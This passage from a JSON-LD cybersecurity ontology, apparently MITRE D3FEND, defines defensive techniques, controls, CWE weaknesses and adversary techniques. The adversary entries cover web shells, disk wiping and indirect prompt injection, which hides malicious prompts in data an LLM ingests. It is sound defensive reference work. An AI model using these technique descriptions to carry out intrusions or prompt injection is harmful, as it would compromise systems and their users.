      "d3f:control-name": "Incident Handling | Malicious Code and Forensic Analysis",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:DynamicAnalysis"
      },
      "rdfs:label": "IR-4(12)"
    },
    {
      "@id": "d3f:AML.T0008",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0008",
      "d3f:definition": "Adversaries may buy, lease, or rent infrastructure for use throughout their operation.\nA wide variety of infrastructure exists for hosting and orchestrating adversary operations.\nInfrastructure solutions include physical or cloud servers, domains, mobile devices, and third-party web services.\nFree resources may also be used, but they are typically limited.\nInfrastructure can also include physical components such as countermeasures that degrade or disrupt AI components or sensors, including printed materials, wearables, or disguises.\n\nUse of these infrastructure solutions allows an adversary to stage, launch, and execute an operation.\nSolutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services.\nDepending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.",
      "rdfs:label": "Acquire Infrastructure - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0008"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Acquire Infrastructure"
    },
    {
      "@id": "d3f:DigitalSignalProcessingApplication",
      "@type": "owl:Class",
      "d3f:definition": "A Digital Signal Processing (DSP) application is a software system that ingests discrete-time or discrete-space signals (from sensors, ADCs, or files) and applies digital signal processing algorithms to analyze, transform, synthesize, or make decisions about those signals, often under real-time throughput and latency constraints. It encompasses capabilities such as filtering, spectral analysis, modulation/demodulation, channelization, synchronization, detection and estimation, compression, beamforming, and reconstruction, and spans domains including software-defined radio (e.g., waveform generation and physical-layer stacks), audio and speech, image and video, radar/sonar/LiDAR, biomedical signals, instrumentation, and control.",
      "d3f:synonym": "DSP Application",
      "rdfs:label": "Digital Signal Processing Application",
      "rdfs:seeAlso": {
        "@id": "dbr:Digital_signal_processing"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:CWE-527",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-527",
      "d3f:definition": "The product stores a CVS, git, or other repository in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors.",
      "rdfs:label": "Exposure of Version-Control Repository to an Unauthorized Control Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:employed-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x employed-by y: An entity x is put into service by a technique or agent y. Inverse of y employs x.",
      "owl:inverseOf": {
        "@id": "d3f:employs"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01161188-v"
      },
      "rdfs:label": "employed-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1271",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1271",
      "d3f:definition": "Security-critical logic is not set to a known value on reset.",
      "rdfs:label": "Uninitialized Value on Reset for Registers Holding Security Settings",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-909"
      }
    },
    {
      "@id": "d3f:Certificate",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:Identifier"
        },
        {
          "@id": "d3f:PublicKey"
        }
      ],
      "d3f:definition": "In cryptography, a public key certificate, also known as a digital certificate or identity certificate, is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject. In email encryption, code signing, and e-signature systems, a certificate's subject is typically a person or organization. However, in Transport Layer Security (TLS) a certificate's subject is typically a computer or other device.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Public_key_certificate"
      },
      "rdfs:label": "Certificate",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/certificate"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N8f22f7ac15de4595a25c7ae8cbf83ace"
        },
        {
          "@id": "_:Ncbad5cf91dd0402eb548227fe6156f24"
        }
      ],
      "skos:altLabel": "Public Key Certificate"
    },
    {
      "@id": "_:N8f22f7ac15de4595a25c7ae8cbf83ace",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Identifier"
      }
    },
    {
      "@id": "_:Ncbad5cf91dd0402eb548227fe6156f24",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PublicKey"
      }
    },
    {
      "@id": "d3f:CWE-537",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-537",
      "d3f:definition": "In many cases, an attacker can leverage the conditions that cause unhandled exception errors in order to gain unauthorized access to the system.",
      "rdfs:label": "Java Runtime Error Message Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-211"
      }
    },
    {
      "@id": "d3f:CWE-756",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-756",
      "d3f:definition": "The product does not return custom error pages to the user, possibly exposing sensitive information.",
      "rdfs:label": "Missing Custom Error Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-755"
      }
    },
    {
      "@id": "d3f:CWE-914",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-914",
      "d3f:definition": "The product does not properly restrict reading from or writing to dynamically-identified variables.",
      "rdfs:label": "Improper Control of Dynamically-Identified Variables",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-913"
        },
        {
          "@id": "d3f:CWE-99"
        }
      ]
    },
    {
      "@id": "d3f:UserAccountPermissions",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UserAccountPermissions"
      ],
      "d3f:d3fend-id": "D3-UAP",
      "d3f:definition": "Restricting a user account's access to resources.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ConfigureUserAccessControlAndPermissions"
      },
      "d3f:restricts": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "User Account Permissions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessPolicyAdministration"
        },
        {
          "@id": "_:Neb4e2906ad9f425c847031723a5679e4"
        }
      ]
    },
    {
      "@id": "_:Neb4e2906ad9f425c847031723a5679e4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1601.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1601.001",
      "d3f:definition": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.",
      "rdfs:label": "Patch System Image",
      "rdfs:subClassOf": {
        "@id": "d3f:T1601"
      }
    },
    {
      "@id": "d3f:macOSProcess",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Process"
      ],
      "rdfs:label": "macOS Process"
    },
    {
      "@id": "d3f:Reference-PrivateVirtualLocalAreaNetworkIsolation_CiscoTechnologyInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20120331142A1"
      },
      "d3f:kb-abstract": "In one embodiment, a method includes obtaining addresses of end hosts at a switch, the switch configured with a primary virtual local area network and a secondary virtual local area network, creating a private virtual local area network access list comprising the addresses of end hosts permitted to communicate on the secondary virtual local area network, and applying the private virtual local area network access list to interfaces connected to the end hosts permitted to communicate on the secondary virtual local area network. An apparatus is also disclosed.",
      "d3f:kb-author": "Anuraag Mittal, Huei-Ping Chen",
      "d3f:kb-organization": "Cisco Technology Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:BroadcastDomainIsolation"
      },
      "d3f:kb-reference-title": "Private virtual local area network isolation",
      "rdfs:label": "Reference - Private virtual local area network isolation - Cisco Technology Inc"
    },
    {
      "@id": "d3f:T1180",
      "@type": "owl:Class",
      "d3f:attack-id": "T1180",
      "d3f:definition": "Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in <code>C:\\Windows\\System32\\</code>, and <code>C:\\Windows\\sysWOW64\\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.002",
      "rdfs:label": "Screensaver",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:has-recipient",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-recipient y: An agent y is the intended recipient and decoder of the information contained in communication x.",
      "rdfs:isDefinedBy": {
        "@id": "http://www.ontologyrepository.com/CommonCoreOntologies/has_recipient"
      },
      "rdfs:label": "has-recipient",
      "rdfs:seeAlso": [
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/09651094-n"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/09788768-n"
        }
      ],
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:PhysicalLink",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:carries": {
        "@id": "d3f:Signal"
      },
      "d3f:definition": "A physical link is a dedicated connection for communication that uses some physical media (electrical, electromagnetic, optical, to include clear spaces or vacuums.)  A physical link represents only a single hop (link) in any larger communcations path, circuit, or network.\n\nNOTE: not synonymous with data link as a data link can be over a telecommunications circuit, which may be a virtual circuit composed of multiple phyical links.",
      "d3f:synonym": "Layer-1 Link",
      "rdfs:label": "Physical Link",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Physical_layer"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Link"
        },
        {
          "@id": "_:N788d3c0ed4564542865d839ea84425a4"
        }
      ]
    },
    {
      "@id": "_:N788d3c0ed4564542865d839ea84425a4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:carries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Signal"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_12",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Data Type Identifiers",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(12)"
    },
    {
      "@id": "d3f:Reference-UseOfAnApplicationControllerToMonitorAndControlSoftwareFileAndApplicationEnvironments_SophosLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180032727A1"
      },
      "d3f:kb-abstract": "In embodiments of the present invention, a framework for an extensible, file-based security system is described for determining an appropriate application, application environment, and/or access or security control measure based at least in part on a file's reputation. In response to the selection of a file, an application controller may be used to select a software application from two or more software applications to open the selected file, based at least in part on the selected file's reputation. If launched, a software application may be configured to open the file in an environment, such as a virtual machine, quarantined environment, and the like, that is appropriate for the file based at least in part on the reputation information. A software application may be a secure software application configured to manage secure files, or an insecure software application configured to manage insecure files. The selected file, and communications relating to the selected software application, may be managed according to the selected software application's secure or insecure configuration. Further, the selected software application may associate reputation information with all files that are modified and/or created by the selected software application, including at least in part, reputation information matching that of the selected file.",
      "d3f:kb-author": "Andrew J. Thomas",
      "d3f:kb-mitre-analysis": "This patent describes received files being open in an environment such as a virtual machine or quarantined environment to associate file reputation information that determines if a file is a threat.",
      "d3f:kb-organization": "Sophos Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:DynamicAnalysis"
      },
      "d3f:kb-reference-title": "Use of an application controller to monitor and control software file and application environments",
      "rdfs:label": "Reference - Use of an application controller to monitor and control software file and application environments - Sophos Ltd"
    },
    {
      "@id": "d3f:SystemConfigurationInitDatabaseRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database record holding information used to configure the services, parameters, and initial settings for an operating system at startup.",
      "rdfs:label": "System Configuration Init Database Record",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemConfigurationDatabaseRecord"
        },
        {
          "@id": "d3f:SystemConfigurationInitResource"
        },
        {
          "@id": "d3f:SystemInitConfiguration"
        }
      ],
      "skos:altLabel": "System Configuration Startup Database Record"
    },
    {
      "@id": "d3f:attack-kb-data-property",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": "attack-kb-data-property",
      "skos:altLabel": "attack-kb-property"
    },
    {
      "@id": "d3f:WindowsRegistryKey",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Windows Registry Keys are container objects similar to folders that contain subkeys and/or data entries called values. A key can be a 'Registry Hive' when it is root key of a logical group of keys, subkeys, and values that has a set of supporting files loaded into memory when the operating system is started or a user logs in.",
      "d3f:may-contain": [
        {
          "@id": "d3f:WindowsRegistryKey"
        },
        {
          "@id": "d3f:WindowsRegistryValue"
        }
      ],
      "rdfs:isDefinedBy": [
        {
          "@id": "http://dbpedia.org/resource/Windows_Registry#Keys_and_values"
        },
        {
          "@id": "https://learn.microsoft.com/en-us/windows/win32/sysinfo/structure-of-the-registry"
        }
      ],
      "rdfs:label": "Windows Registry Key",
      "rdfs:seeAlso": [
        {
          "@id": "https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-hives"
        },
        {
          "@id": "https://schema.ocsf.io/objects/registry_key"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemConfigurationDatabaseRecord"
        },
        {
          "@id": "_:N725eab2abc8a4d7a9a2813dc50ab28ad"
        },
        {
          "@id": "_:N44f17afe987b42c4bc3ad8acc1ce90ca"
        },
        {
          "@id": "_:Na1415071d5a64f8099b4a29ddf2e9fec"
        }
      ]
    },
    {
      "@id": "_:N725eab2abc8a4d7a9a2813dc50ab28ad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKey"
      }
    },
    {
      "@id": "_:N44f17afe987b42c4bc3ad8acc1ce90ca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryValue"
      }
    },
    {
      "@id": "_:Na1415071d5a64f8099b4a29ddf2e9fec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:windows-registry-key"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "d3f:T0853",
      "@type": "owl:Class",
      "d3f:attack-id": "T0853",
      "d3f:definition": "Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions.",
      "rdfs:label": "Scripting - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Scripting"
    },
    {
      "@id": "d3f:T1015",
      "@type": "owl:Class",
      "d3f:attack-id": "T1015",
      "d3f:definition": "Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.008",
      "rdfs:label": "Accessibility Features",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.008"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-778",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-778",
      "d3f:definition": "When a security-critical event occurs, the product either does not record the event or omits important details about the event when logging it.",
      "rdfs:label": "Insufficient Logging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-223"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:LinuxELFFile32bit",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableBinary"
      ],
      "d3f:definition": "test",
      "rdfs:label": "Linux ELF File 32bit"
    },
    {
      "@id": "d3f:CCI-002712_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:PointerAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system performs an integrity check of organization-defined information at startup, at organization-defined transitional states or security-relevant events, or on an organization-defined frequency.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002712"
    },
    {
      "@id": "d3f:OperatingSystemLogFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating system log file records events that occur in an operating system.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Log_file"
      },
      "rdfs:label": "Operating System Log File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LogFile"
        },
        {
          "@id": "d3f:OperatingSystemFile"
        }
      ]
    },
    {
      "@id": "d3f:T0849",
      "@type": "owl:Class",
      "d3f:attack-id": "T0849",
      "d3f:definition": "Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion. Possible disguises of these masquerading files can include commonly found programs, expected vendor executables and configuration files, and other commonplace application and naming conventions. By impersonating expected and vendor-relevant files and applications, operators and engineers may not notice the presence of the underlying malicious content and possibly end up running those masquerading as legitimate functions.",
      "rdfs:label": "Masquerading - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSEvasionTechnique"
      },
      "skos:prefLabel": "Masquerading"
    },
    {
      "@id": "d3f:ATTACKMobileTactic",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Mobile Tactic",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileThing"
      }
    },
    {
      "@id": "d3f:T1071.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1071.005",
      "d3f:definition": "Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.",
      "rdfs:label": "Publish/Subscribe Protocols",
      "rdfs:subClassOf": {
        "@id": "d3f:T1071"
      }
    },
    {
      "@id": "d3f:T1561",
      "@type": "owl:Class",
      "d3f:attack-id": "T1561",
      "d3f:definition": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.",
      "rdfs:label": "Disk Wipe",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:RemoteLoginSession",
      "@type": "owl:Class",
      "d3f:definition": "A remote login session is a login session where a client has logged in from their local host machine to a server via a network.",
      "rdfs:label": "Remote Login Session",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkSession"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-4_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "System Monitoring | Inbound and Outbound Communications Traffic",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "rdfs:label": "SI-4(4)"
    },
    {
      "@id": "d3f:CCI-001662_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system takes organization-defined corrective action when organization-defined unacceptable mobile code is identified.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DynamicAnalysis"
        },
        {
          "@id": "d3f:EmulatedFileAnalysis"
        },
        {
          "@id": "d3f:FileContentRules"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-12T00:00:00"
      },
      "rdfs:label": "CCI-001662"
    },
    {
      "@id": "d3f:High-dimensionClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HDC",
      "d3f:definition": "The cluster analysis of data with anywhere from a few dozen to many thousands of dimensions.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Clustering high-dimensional data. [Link](https://en.wikipedia.org/wiki/Clustering_high-dimensional_data)",
      "rdfs:label": "High-dimension Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:Actor-Critic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AC",
      "d3f:definition": "Actor-Critic is a Temporal Difference(TD) version of Policy gradient. It has two networks: Actor and Critic. The actor decided which action should be taken and critic inform the actor how good was the action and how it should adjust. The learning of the actor is based on policy gradient approach. In comparison, critics evaluate the action produced by the actor by computing the value function.",
      "d3f:kb-article": "## References\nThe Actor-Critic Reinforcement Learning Algorithm. Medium. [Link](https://medium.com/intro-to-artificial-intelligence/the-actor-critic-reinforcement-learning-algorithm-c8095a655c14).",
      "rdfs:label": "Actor-Critic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PolicyGradient"
        },
        {
          "@id": "d3f:TemporalDifferenceLearning"
        }
      ]
    },
    {
      "@id": "d3f:Reference-ConfigureUserAccessControlAndPermissions",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/windows-server/manage/windows-admin-center/configure/user-access-control"
      },
      "d3f:kb-abstract": "When deployed on Windows Server, Windows Admin Center provides a centralized point of management for your server environment. By controlling access to Windows Admin Center, you can improve the security of your management landscape.",
      "d3f:kb-author": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:kb-reference-title": "Configure User Access Control and Permissions",
      "rdfs:label": "Reference - Configure User Access Control and Permissions"
    },
    {
      "@id": "d3f:NetworkFileShareResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A shared file resource, or network file share, is a computer file made available from one host to other hosts on a computer network. Network sharing is made possible by inter-process communication over the network. It includes both files and directories.",
      "rdfs:label": "Network File Share Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:T1589.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1589.001",
      "d3f:definition": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.",
      "rdfs:label": "Credentials",
      "rdfs:subClassOf": {
        "@id": "d3f:T1589"
      }
    },
    {
      "@id": "d3f:EventLogDeleteEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the event log database, file, or cache is deleted from the system, removing the log's historical records.",
      "rdfs:label": "Event Log Delete Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:T0863",
      "@type": "owl:Class",
      "d3f:attack-id": "T0863",
      "d3f:definition": "Adversaries may rely on a targeted organizations user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents.",
      "rdfs:label": "User Execution - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "User Execution"
    },
    {
      "@id": "d3f:T1505.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:WebScriptFile"
      },
      "d3f:attack-id": "T1505.003",
      "d3f:definition": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)",
      "d3f:modifies": {
        "@id": "d3f:WebServer"
      },
      "d3f:produces": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Web Shell",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1505"
        },
        {
          "@id": "_:N0f640bd07dfe45aea28a2e61027beac7"
        },
        {
          "@id": "_:Naddace56ac564207a3132a46b6f5d80b"
        },
        {
          "@id": "_:Nbf9cf33f67a646adb9dead079240f411"
        }
      ]
    },
    {
      "@id": "_:N0f640bd07dfe45aea28a2e61027beac7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebScriptFile"
      }
    },
    {
      "@id": "_:Naddace56ac564207a3132a46b6f5d80b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebServer"
      }
    },
    {
      "@id": "_:Nbf9cf33f67a646adb9dead079240f411",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:NetworkConnectionOpenEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network connection is successfully opened.",
      "rdfs:label": "Network Connection Open Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkConnectionEvent"
      }
    },
    {
      "@id": "d3f:ATLASInitialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0004"
      },
      "rdfs:label": "Initial Access Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:Nb38914e39d414bfc83adc19db88d0efa"
        }
      ],
      "skos:prefLabel": "Initial Access Technique"
    },
    {
      "@id": "_:Nb38914e39d414bfc83adc19db88d0efa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0004"
      }
    },
    {
      "@id": "d3f:AML.T0051.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0051.001",
      "d3f:definition": "An adversary may inject prompts indirectly via separate data channel ingested by the LLM such as include text or multimedia pulled from databases or websites.\nThese malicious prompts may be hidden or obfuscated from the user. This type of injection may be used by the adversary to gain a foothold in the system or to target an unwitting user of the system.",
      "rdfs:label": "Indirect - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0051.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0051"
      },
      "skos:prefLabel": "Indirect"
    },
    {
      "@id": "d3f:DiskEncryption",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DiskEncryption"
      ],
      "d3f:d3fend-id": "D3-DENCR",
      "d3f:definition": "Encrypting a hard disk partition to prevent cleartext access to a file system.",
      "d3f:encrypts": {
        "@id": "d3f:Storage"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-LUKS1On-DiskFormatSpecificationVersion1.2.3"
      },
      "rdfs:label": "Disk Encryption",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:N543b8b6e8cff4de6b16b58655a808a39"
        }
      ]
    },
    {
      "@id": "_:N543b8b6e8cff4de6b16b58655a808a39",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:encrypts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Storage"
      }
    },
    {
      "@id": "d3f:PasswordRotation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PasswordRotation"
      ],
      "d3f:d3fend-id": "D3-PR",
      "d3f:definition": "Password rotation is a security policy that mandates the periodic change of user account passwords to mitigate the risk of unauthorized access due to compromised credentials.",
